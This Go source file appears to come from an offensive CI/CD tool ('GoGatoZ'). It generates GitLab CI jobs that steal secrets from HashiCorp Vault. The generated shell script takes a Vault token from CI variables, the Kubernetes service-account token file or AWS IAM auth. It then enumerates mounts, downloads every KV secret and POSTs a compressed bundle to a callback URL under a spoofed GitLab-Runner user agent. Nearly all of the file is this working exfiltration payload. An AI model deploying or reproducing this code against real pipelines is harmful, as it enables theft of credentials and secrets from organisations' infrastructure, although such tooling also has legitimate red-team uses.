package payloads

import (
	"fmt"
	"strings"
)

// VaultEnumOptions configures a HashiCorp Vault enumeration payload that
// discovers and exfiltrates secrets from Vault instances accessible from
// CI/CD runners. Runners in Kubernetes or AWS environments often have
// implicit Vault access via service account tokens or IAM roles.
//
// Attack surface:
//   - VAULT_ADDR + VAULT_TOKEN leaked in CI variables
//   - Kubernetes service account JWT auto-auth
//   - AWS IAM role assumed by the runner instance
//   - Vault Agent sidecar socket on the runner pod
type VaultEnumOptions struct {
	Common      CommonOptions
	VaultAddr   string   // Vault server URL (falls back to $VAULT_ADDR)
	AuthMethod  string   // "token" (default), "kubernetes", "aws"
	MountPaths  []string // KV mount paths to enumerate (default: ["secret"])
	CallbackURL string   // HTTP POST for exfil (default: artifact only)
}

// GenerateVaultEnumYAML returns a GitLab CI job that enumerates and
// exfiltrates secrets from a reachable HashiCorp Vault instance.
func GenerateVaultEnumYAML(o VaultEnumOptions) string {
	name, stage := o.Common.defaults("vault-enum")

	script := buildVaultEnumScript(o)

	// Indent every line of the script by 6 spaces so it sits inside
	// the YAML block scalar (    - |\n      <content>).
	indented := indentScript(script, "      ")

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Vault Enumeration)
# Enumerates HashiCorp Vault KV mounts and exfiltrates secrets
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

// buildVaultEnumScript generates the shell script for Vault enumeration
// and secret extraction.
func buildVaultEnumScript(o VaultEnumOptions) string {
	var b strings.Builder

	vaultAddr := strings.TrimSpace(o.VaultAddr)
	authMethod := strings.ToLower(strings.TrimSpace(o.AuthMethod))
	if authMethod == "" {
		authMethod = "token"
	}

	mounts := o.MountPaths
	if len(mounts) == 0 {
		mounts = []string{"secret"}
	}

	b.WriteString("set -e\n")
	b.WriteString("_vault_enum() {\n")
	b.WriteString(`  _d=$(mktemp -d)
  echo "[*] Vault enumeration working directory: $_d"

`)

	// Step 1: Detect VAULT_ADDR
	b.WriteString(`  # 1. Detect Vault address
  _vaddr="${VAULT_ADDR:-}"
`)
	if vaultAddr != "" {
		b.WriteString(fmt.Sprintf(`  [ -z "$_vaddr" ] && _vaddr="%s"
`, vaultAddr))
	}
	b.WriteString(`  if [ -z "$_vaddr" ]; then
    echo "[-] VAULT_ADDR not set and no address provided"
    rm -rf "$_d"
    return 1
  fi
  echo "[+] Vault address: $_vaddr"

`)

	// Step 2: Obtain Vault token based on auth method
	b.WriteString(`  # 2. Obtain Vault token
  _vtok="${VAULT_TOKEN:-}"
`)

	switch authMethod {
	case "kubernetes":
		b.WriteString(`  if [ -z "$_vtok" ]; then
    echo "[*] Attempting Kubernetes service account auth..."
    _sa_token=""
    if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
      _sa_token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    fi
    if [ -n "$_sa_token" ]; then
      _resp=$(curl -sS -X POST \
        -H "Content-Type: application/json" \
        -d "{\"jwt\":\"$_sa_token\",\"role\":\"${VAULT_K8S_ROLE:-default}\"}" \
        "${_vaddr}/v1/auth/kubernetes/login" 2>/dev/null || echo "")
      _vtok=$(echo "$_resp" | grep -o '"client_token":"[^"]*"' | head -1 | cut -d'"' -f4)
      [ -n "$_vtok" ] && echo "[+] Authenticated via Kubernetes SA"
    fi
  fi
`)
	case "aws":
		b.WriteString(`  if [ -z "$_vtok" ]; then
    echo "[*] Attempting AWS IAM auth..."
    if command -v curl >/dev/null 2>&1; then
      _iam_body=$(curl -sS -X POST \
        -H "Content-Type: application/json" \
        -d "{\"role\":\"${VAULT_AWS_ROLE:-default}\"}" \
        "${_vaddr}/v1/auth/aws/login" 2>/dev/null || echo "")
      _vtok=$(echo "$_iam_body" | grep -o '"client_token":"[^"]*"' | head -1 | cut -d'"' -f4)
      [ -n "$_vtok" ] && echo "[+] Authenticated via AWS IAM"
    fi
  fi
`)
	default:
		// token auth — already read from VAULT_TOKEN above
	}

	b.WriteString(`  if [ -z "$_vtok" ]; then
    echo "[-] No Vault token obtained"
    rm -rf "$_d"
    return 1
  fi

`)

	// Step 3: Enumerate sys/mounts
	b.WriteString(fmt.Sprintf(`  # 3. Enumerate Vault mounts
  echo "[*] Querying sys/mounts..."
  curl -sS -H "X-Vault-Token: $_vtok" \
    "${_vaddr}/v1/sys/mounts" > "$_d/mounts.json" 2>/dev/null || true
  echo "[+] Mounts saved to mounts.json"

  # 4. List and extract secrets from target mounts
  echo "[*] Enumerating %d mount path(s)..."
`, len(mounts)))

	// Step 4: Per-mount enumeration
	for _, mount := range mounts {
		m := strings.TrimSpace(mount)
		if m == "" {
			continue
		}
		// Remove trailing slash for consistency
		m = strings.TrimRight(m, "/")

		b.WriteString(fmt.Sprintf(`  echo "[*] Listing secrets in mount: %s"
  mkdir -p "$_d/secrets/%s"
  _keys=$(curl -sS -H "X-Vault-Token: $_vtok" \
    --request LIST \
    "${_vaddr}/v1/%s/metadata/?list=true" 2>/dev/null || echo "")
  echo "$_keys" > "$_d/secrets/%s/_keys.json"

  # Extract individual keys
  echo "$_keys" | grep -o '"[^"]*"' | tr -d '"' | while read -r _key; do
    case "$_key" in keys|request_id|lease_id|renewable|lease_duration|wrap_info|warnings|auth|data) continue ;; esac
    _safe=$(echo "$_key" | tr '/' '_')
    curl -sS -H "X-Vault-Token: $_vtok" \
      "${_vaddr}/v1/%s/data/${_key}" > "$_d/secrets/%s/${_safe}.json" 2>/dev/null || true
  done
  echo "[+] Mount %s enumerated"

`, m, m, m, m, m, m, m))
	}

	// Step 5: Compress
	b.WriteString(`  # 5. Compress all collected data
  echo "[*] Compressing Vault data..."
  tar czf "$_d/vault_bundle.tgz" -C "$_d" mounts.json secrets/ 2>/dev/null || \
  tar czf "$_d/vault_bundle.tgz" -C "$_d" mounts.json 2>/dev/null

`)

	// Step 6: Exfiltration
	c2 := strings.TrimSpace(o.CallbackURL)
	if c2 != "" {
		b.WriteString(fmt.Sprintf(`  # 6. Exfiltrate to callback server
  echo "[*] Exfiltrating to: %s"
  curl -sS -X POST \
    -H "Content-Type: application/octet-stream" \
    -H "User-Agent: GitLab-Runner/16.0" \
    --data-binary @"$_d/vault_bundle.tgz" \
    "%s" >/dev/null 2>&1 || true
`, c2, c2))
	} else {
		b.WriteString(`  # 6. Output summary (artifact-only mode)
  echo "[*] Vault enumeration complete. Data available in artifacts."
  echo "[+] Mounts discovered: $(wc -c < "$_d/mounts.json" 2>/dev/null || echo 0) bytes"

`)
	}

	b.WriteString(`  # 7. Cleanup
  rm -rf "$_d"
  echo "[*] Vault enumeration complete"
}

_vault_enum
`)

	return b.String()
}
